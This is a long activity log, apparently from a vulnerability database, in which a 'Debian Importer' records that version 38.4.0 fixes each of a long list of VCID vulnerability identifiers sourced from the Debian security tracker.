2026-04-16T11:12:32.000512+00:00 Debian Importer Fixing VCID-p3vh-b6jn-f3e2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:12:25.275224+00:00 Debian Importer Fixing VCID-mv9q-facp-yub3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:10:19.145305+00:00 Debian Importer Fixing VCID-7eeu-wtkq-dyc1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:10:16.079049+00:00 Debian Importer Fixing VCID-vd3a-e897-8bfn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:10:00.539083+00:00 Debian Importer Fixing VCID-pnk5-26uq-w3cu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:09:21.872294+00:00 Debian Importer Fixing VCID-7gya-qyjx-qqfx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:07:59.645166+00:00 Debian Importer Fixing VCID-zuht-nypg-33fg https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:07:39.173068+00:00 Debian Importer Fixing VCID-6jvf-8pfe-m3cn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:06:52.667172+00:00 Debian Importer Fixing VCID-q37s-1azj-xkhv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:06:34.949009+00:00 Debian Importer Fixing VCID-mcef-v74u-pke3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:06:15.374009+00:00 Debian Importer Fixing VCID-66hm-jwxw-x3hu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:06:10.333542+00:00 Debian Importer Fixing VCID-4pzm-24uf-73b6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:05:44.650706+00:00 Debian Importer Fixing VCID-5uyd-bv33-h7g1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:05:31.096478+00:00 Debian Importer Fixing VCID-zh44-pz7k-abba https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:05:27.985037+00:00 Debian Importer Fixing VCID-7kza-xvmr-sqhe https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:05:06.016445+00:00 Debian Importer Fixing VCID-v1f2-upex-43fm https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:04:09.282358+00:00 Debian Importer Fixing VCID-47zb-362f-n3b8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:04:04.868977+00:00 Debian Importer Fixing VCID-xy5b-m3h2-hbfj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:03:47.403830+00:00 Debian Importer Fixing VCID-xzye-g5rw-fyh5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:03:31.647593+00:00 Debian Importer Fixing VCID-4urn-ywwt-ayeg https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:03:15.484733+00:00 Debian Importer Fixing VCID-a1z8-rynx-p7a8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:02:52.118787+00:00 Debian Importer Fixing VCID-gp36-v664-vuh2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:02:28.131097+00:00 Debian Importer Fixing VCID-7jx8-htkz-7qd4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:02:26.178253+00:00 Debian Importer Fixing VCID-rwnm-ssex-tfgr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:02:21.076865+00:00 Debian Importer Fixing VCID-vzru-smr4-5kfk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:01:58.325671+00:00 Debian Importer Fixing VCID-3fzh-1hk1-3ub1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:01:33.369221+00:00 Debian Importer Fixing VCID-6vvv-g1fm-4bdn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:01:19.878313+00:00 Debian Importer Fixing VCID-q2zg-jh8m-tua2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:00:59.005895+00:00 Debian Importer Fixing VCID-2r23-hhkx-9fh6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:59:52.729797+00:00 Debian Importer Fixing VCID-k6ar-hru3-hygu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:58:29.069937+00:00 Debian Importer Fixing VCID-knc1-7mhm-vbhn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:58:06.937039+00:00 Debian Importer Fixing VCID-fnmv-18fv-8kf3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:58:04.393460+00:00 Debian Importer Fixing VCID-snup-2hn7-sue2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:57:35.636935+00:00 Debian Importer Fixing VCID-2dgn-j4dn-9fcd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:57:32.129487+00:00 Debian Importer Fixing VCID-zv8w-puzj-23cd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:57:27.192427+00:00 Debian Importer Fixing VCID-4kxf-5xrh-uue8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:55:19.662423+00:00 Debian Importer Fixing VCID-eqr7-q1ga-8kcr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:55:11.018766+00:00 Debian Importer Fixing VCID-56xz-svu7-eue2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:55:01.349818+00:00 Debian Importer Fixing VCID-3qad-mewf-8khz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:54:37.951326+00:00 Debian Importer Fixing VCID-uwbu-vzay-q3ak https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:54:32.701916+00:00 Debian Importer Fixing VCID-93mt-5yvb-zfga https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:53:58.558434+00:00 Debian Importer Fixing VCID-6qqv-wf7w-xfaf https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:53:20.127197+00:00 Debian Importer Fixing VCID-62ar-kwbq-nyh3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:52:20.606462+00:00 Debian Importer Fixing VCID-punt-nwt4-uqea https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:51:21.492824+00:00 Debian Importer Fixing VCID-8an6-y8xy-pyf3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:51:13.256175+00:00 Debian Importer Fixing VCID-1daq-9kb7-eudz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:51:02.744304+00:00 Debian Importer Fixing VCID-jvq6-xjbu-fkb9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:50:53.347594+00:00 Debian Importer Fixing VCID-nnmr-dnnk-qkc4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:50:50.456577+00:00 Debian Importer Fixing VCID-pcme-bwan-3bcf https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:49:33.130268+00:00 Debian Importer Fixing VCID-fbta-m4mx-jfap https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:49:07.440045+00:00 Debian Importer Fixing VCID-rwat-s4hf-v7bv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:49:04.309371+00:00 Debian Importer Fixing VCID-et5y-g25w-4qay https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:47:51.181173+00:00 Debian Importer Fixing VCID-3cn6-jf51-3qdv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:47:42.402856+00:00 Debian Importer Fixing VCID-9xbc-3nhd-cygp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:47:40.116732+00:00 Debian Importer Fixing VCID-h221-qd8d-tqa5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:47:13.906485+00:00 Debian Importer Fixing VCID-x19m-3m6f-4khb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:47:09.602459+00:00 Debian Importer Fixing VCID-k7ku-8uya-kbeu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:46:37.065523+00:00 Debian Importer Fixing VCID-v8ma-knpq-wkdv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:46:23.242612+00:00 Debian Importer Fixing VCID-p84t-bztf-cqdz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:45:03.039327+00:00 Debian Importer Fixing VCID-5s8n-dfjf-ruey https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:45:00.397806+00:00 Debian Importer Fixing VCID-uwq6-h2du-dkdn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:44:10.412170+00:00 Debian Importer Fixing VCID-qu7p-k327-6uht https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:43:59.016104+00:00 Debian Importer Fixing VCID-99f6-k1y9-x7ba https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:43:39.299888+00:00 Debian Importer Fixing VCID-jpxf-qevp-kycp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:42:16.064720+00:00 Debian Importer Fixing VCID-7cbm-nm6u-8kdp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:42:05.039454+00:00 Debian Importer Fixing VCID-x8j9-exk2-mkez https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:41:56.163544+00:00 Debian Importer Fixing VCID-59yn-uan9-sucn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:40:51.591429+00:00 Debian Importer Fixing VCID-jcmt-5fes-jug2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:40:48.125891+00:00 Debian Importer Fixing VCID-65b6-jbxy-gudt https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:40:43.510892+00:00 Debian Importer Fixing VCID-56ad-fjzb-bycr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:40:12.368470+00:00 Debian Importer Fixing VCID-1y2e-akpf-ufbc https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:40:06.106579+00:00 Debian Importer Fixing VCID-tnnn-bg52-93a9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:39:30.163565+00:00 Debian Importer Fixing VCID-12j6-qbjn-m3d7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:38:36.925562+00:00 Debian Importer Fixing VCID-92es-dtbz-tqae https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:38:32.272800+00:00 Debian Importer Fixing VCID-5114-9n17-pkd1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:35:33.793174+00:00 Debian Importer Fixing VCID-mn7e-8e4j-dqba https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:35:21.101704+00:00 Debian Importer Fixing VCID-txaa-zcha-wbbv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:35:02.371999+00:00 Debian Importer Fixing VCID-tn11-bwg6-m3e3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:34:59.406198+00:00 Debian Importer Fixing VCID-b38j-8u7n-47ga https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:34:53.100006+00:00 Debian Importer Fixing VCID-bky2-hjpj-67ag https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:34:47.637036+00:00 Debian Importer Fixing VCID-epd6-xsva-17ea https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:33:25.686288+00:00 Debian Importer Fixing VCID-ep6g-44qy-5qd7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:32:49.172751+00:00 Debian Importer Fixing VCID-jqv2-v42r-7ybf https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:32:41.737772+00:00 Debian Importer Fixing VCID-1r3u-6afm-23f2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:32:26.436422+00:00 Debian Importer Fixing VCID-7vrs-x5dn-sbcm https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:32:11.106225+00:00 Debian Importer Fixing VCID-ta5n-gyp1-c3dk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:31:41.031160+00:00 Debian Importer Fixing VCID-bmhu-4vgv-y7gy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:31:22.902323+00:00 Debian Importer Fixing VCID-7t1t-1spz-gfee https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:31:03.366119+00:00 Debian Importer Fixing VCID-ny9s-4kcr-tbf4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:30:38.624465+00:00 Debian Importer Fixing VCID-tms4-1k6m-cqgd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:29:58.112637+00:00 Debian Importer Fixing VCID-569d-6nue-5kbq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:29:48.221131+00:00 Debian Importer Fixing VCID-2495-gquz-9bd1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:29:18.741465+00:00 Debian Importer Fixing VCID-78zg-am5w-gugh https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:28:56.934545+00:00 Debian Importer Fixing VCID-vf3u-cgrx-a7d7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:27:39.043739+00:00 Debian Importer Fixing VCID-ef36-52cx-dfg5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:27:33.633249+00:00 Debian Importer Fixing VCID-tv6b-u42h-xkh2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:26:54.614731+00:00 Debian Importer Fixing VCID-acsa-1uwk-fqee https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:26:21.318251+00:00 Debian Importer Fixing VCID-s6bw-85wn-jygp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:26:16.007071+00:00 Debian Importer Fixing VCID-nvpf-y2es-3fcz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:26:15.956637+00:00 Debian Importer Fixing VCID-n7rz-ssve-t7bm https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:26:02.494961+00:00 Debian Importer Fixing VCID-sdw2-cg48-b3fd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:25:24.293167+00:00 Debian Importer Fixing VCID-zrkc-cfnt-r7hr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:25:20.874351+00:00 Debian Importer Fixing VCID-eb86-ytt7-j3gf https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:24:40.654138+00:00 Debian Importer Fixing VCID-h6ps-ukb8-qfa9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:23:37.889158+00:00 Debian Importer Fixing VCID-rxgw-h3br-b7dy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:23:34.801092+00:00 Debian Importer Fixing VCID-qp4x-w3fe-hyer https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:23:21.551460+00:00 Debian Importer Fixing VCID-1x18-b9sa-yygh https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:23:19.669987+00:00 Debian Importer Fixing VCID-1q97-afut-4ffy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:23:15.165126+00:00 Debian Importer Fixing VCID-fds9-yfxw-gqgs https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:23:12.857745+00:00 Debian Importer Fixing VCID-2m38-vt4m-5ffa https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:23:08.273911+00:00 Debian Importer Fixing VCID-bjr3-shza-a7hc https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:22:50.338067+00:00 Debian Importer Fixing VCID-j8rp-wchj-qfhz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:21:43.864742+00:00 Debian Importer Fixing VCID-1223-kpm6-2fh6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:21:43.453002+00:00 Debian Importer Fixing VCID-7dh9-2g6c-6qhg https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:21:37.466484+00:00 Debian Importer Fixing VCID-nxfx-jh82-vud3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:20:39.166467+00:00 Debian Importer Fixing VCID-nvea-drm5-h3au https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:20:33.592248+00:00 Debian Importer Fixing VCID-dmut-jm9s-8ucc https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:20:29.763471+00:00 Debian Importer Fixing VCID-kefv-kpkk-wudf https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:18:23.453955+00:00 Debian Importer Fixing VCID-ky7v-89bx-3qc8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:18:19.565007+00:00 Debian Importer Fixing VCID-gdy9-dhzs-aqh9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:17:55.339515+00:00 Debian Importer Fixing VCID-xk7c-7f1m-sqe5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:17:00.882427+00:00 Debian Importer Fixing VCID-psf6-cvdn-h3b1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:16:53.303201+00:00 Debian Importer Fixing VCID-nvp5-dpj6-byda https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:16:27.341987+00:00 Debian Importer Fixing VCID-6jnv-nnkm-v7a3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:15:56.514736+00:00 Debian Importer Fixing VCID-5y2n-8d43-vfft https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:15:55.041709+00:00 Debian Importer Fixing VCID-tdsq-gc81-hqda https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:15:50.407569+00:00 Debian Importer Fixing VCID-v6h3-xnz8-xud4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:15:48.015844+00:00 Debian Importer Fixing VCID-x9y3-z82n-33d8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:15:41.309421+00:00 Debian Importer Fixing VCID-79w4-fqmh-j3bk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:15:34.377881+00:00 Debian Importer Fixing VCID-hc1j-dabv-pyge https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:15:29.687129+00:00 Debian Importer Fixing VCID-453d-2nac-jbdc https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:15:05.270631+00:00 Debian Importer Fixing VCID-sdc2-fcap-abaz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:15:02.501690+00:00 Debian Importer Fixing VCID-q5su-zt4m-sqgx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:14:52.892326+00:00 Debian Importer Fixing VCID-e3av-cqc9-dye1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:14:48.694910+00:00 Debian Importer Fixing VCID-gx9p-3qdr-ebgw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:14:30.503145+00:00 Debian Importer Fixing VCID-dtza-65ku-aber https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:14:02.822718+00:00 Debian Importer Fixing VCID-thbh-m54e-z7ca https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:13:21.299820+00:00 Debian Importer Fixing VCID-18rv-b2mg-jbex https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:13:14.603475+00:00 Debian Importer Fixing VCID-yj6z-ege2-37gt https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:13:12.386240+00:00 Debian Importer Fixing VCID-rhpj-r7ym-7kdn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:12:49.439131+00:00 Debian Importer Fixing VCID-zfy5-md9a-h3gy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:12:32.321571+00:00 Debian Importer Fixing VCID-qsna-fp92-syce https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:12:19.464245+00:00 Debian Importer Fixing VCID-g6sp-5zkq-dkf9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:11:58.377399+00:00 Debian Importer Fixing VCID-r1uc-e1w7-kyda https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:11:49.696740+00:00 Debian Importer Fixing VCID-5qyh-zkxd-73c5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:11:49.625219+00:00 Debian Importer Fixing VCID-huhv-jxyu-jygx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:11:07.762044+00:00 Debian Importer Fixing VCID-9n1x-qw25-mbhf https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:11:03.280776+00:00 Debian Importer Fixing VCID-ezcj-2yaf-rfhh https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:10:44.964199+00:00 Debian Importer Fixing VCID-8drx-cw3m-dufq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:10:36.429263+00:00 Debian Importer Fixing VCID-x3wb-64kk-gues https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:09:55.773249+00:00 Debian Importer Fixing VCID-2ken-ysm1-2ybw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:09:53.722064+00:00 Debian Importer Fixing VCID-h7em-v8x6-63e3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:09:45.276968+00:00 Debian Importer Fixing VCID-j559-5amz-4qff https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:09:30.227606+00:00 Debian Importer Fixing VCID-wz1j-6ne4-m3a5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:09:16.252365+00:00 Debian Importer Fixing VCID-ucfp-qqy4-jqdm https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:08:45.643232+00:00 Debian Importer Fixing VCID-rvjq-uks4-x3h3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:08:26.616475+00:00 Debian Importer Fixing VCID-uvpj-a8v5-ebgz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:07:22.855003+00:00 Debian Importer Fixing VCID-eg3d-khb6-rfh1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:07:01.800635+00:00 Debian Importer Fixing VCID-acgu-hc83-yubn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:06:59.637639+00:00 Debian Importer Fixing VCID-yx7r-r7ez-7uhp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:06:46.735289+00:00 Debian Importer Fixing VCID-dcde-mybb-bygv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:06:00.336191+00:00 Debian Importer Fixing VCID-fd5j-v9vt-5fbu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:05:44.282829+00:00 Debian Importer Fixing VCID-5xqd-gf3b-4ygw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:04:49.577464+00:00 Debian Importer Fixing VCID-hcjv-e7jt-nbbp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:04:31.370349+00:00 Debian Importer Fixing VCID-6e1q-75mk-pygm https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:04:21.839407+00:00 Debian Importer Fixing VCID-q3v4-jztv-9bbs https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:04:01.428058+00:00 Debian Importer Fixing VCID-nz2d-nk9v-f7cn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:03:35.680184+00:00 Debian Importer Fixing VCID-rm64-smat-8kfw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:03:14.174375+00:00 Debian Importer Fixing VCID-jkdz-rbkr-pygc https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:02:54.396360+00:00 Debian Importer Fixing VCID-szhs-nysy-6bap https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:02:41.080734+00:00 Debian Importer Fixing VCID-xtq9-fvcv-kfat https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:02:35.092831+00:00 Debian Importer Fixing VCID-ephb-spyf-c7d2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:02:15.462398+00:00 Debian Importer Fixing VCID-6d5n-tv5h-xkhj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:00:28.370582+00:00 Debian Importer Fixing VCID-smtf-q6g7-fqen https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:00:22.407306+00:00 Debian Importer Fixing VCID-gqgz-418x-skd3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:00:19.705428+00:00 Debian Importer Fixing VCID-hry9-mkha-nfct https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:00:10.737538+00:00 Debian Importer Fixing VCID-uhe3-t6mw-ckd2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:59:14.371610+00:00 Debian Importer Fixing VCID-rqm7-d751-myfa https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:58:31.774976+00:00 Debian Importer Fixing VCID-xp7w-rc4w-jqcj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:57:56.077112+00:00 Debian Importer Fixing VCID-ury3-3x4b-1qh2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:57:54.243365+00:00 Debian Importer Fixing VCID-c11x-uq25-17b1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:57:25.052676+00:00 Debian Importer Fixing VCID-2dwv-ndt5-gfg2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:57:21.017752+00:00 Debian Importer Fixing VCID-my4x-d8ru-pybj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:56:57.947095+00:00 Debian Importer Fixing VCID-93em-sxxc-j3ep https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:55:06.505514+00:00 Debian Importer Fixing VCID-1nrq-kzuy-vyfx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:55:02.183496+00:00 Debian Importer Fixing VCID-8jgu-2tx3-gkcb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:53:48.967554+00:00 Debian Importer Fixing VCID-9ewm-6688-kkar https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:53:39.314601+00:00 Debian Importer Fixing VCID-5u53-66es-vkbv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:53:14.085832+00:00 Debian Importer Fixing VCID-p5f8-45e4-ybex https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:52:46.600803+00:00 Debian Importer Fixing VCID-jbt4-qpnp-yqdm https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:52:36.434793+00:00 Debian Importer Fixing VCID-6y99-sgwe-tygw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:52:08.183129+00:00 Debian Importer Fixing VCID-gqky-zdxn-e3gd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:51:55.985674+00:00 Debian Importer Fixing VCID-vbdt-31wd-v3h8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:50:46.836362+00:00 Debian Importer Fixing VCID-6bf2-uh5z-kfg7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:50:20.095216+00:00 Debian Importer Fixing VCID-kert-7sg4-mke5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:50:04.243119+00:00 Debian Importer Fixing VCID-cjf4-c7t6-hqat https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:49:59.037476+00:00 Debian Importer Fixing VCID-w5fb-28z5-rkfq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:49:44.238897+00:00 Debian Importer Fixing VCID-yz4e-znfx-zqhe https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:49:30.988738+00:00 Debian Importer Fixing VCID-1q1g-ses8-wqae https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:49:12.490724+00:00 Debian Importer Fixing VCID-4dxa-f7vm-7feh https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:49:10.199796+00:00 Debian Importer Fixing VCID-rzz2-km3v-b3hw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:49:05.355544+00:00 Debian Importer Fixing VCID-zz1j-vw4k-ukdc https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:48:55.839172+00:00 Debian Importer Fixing VCID-bz5u-dqy6-4ucd https://security-tracker.debian.org/tracker/data/json 38.4.0
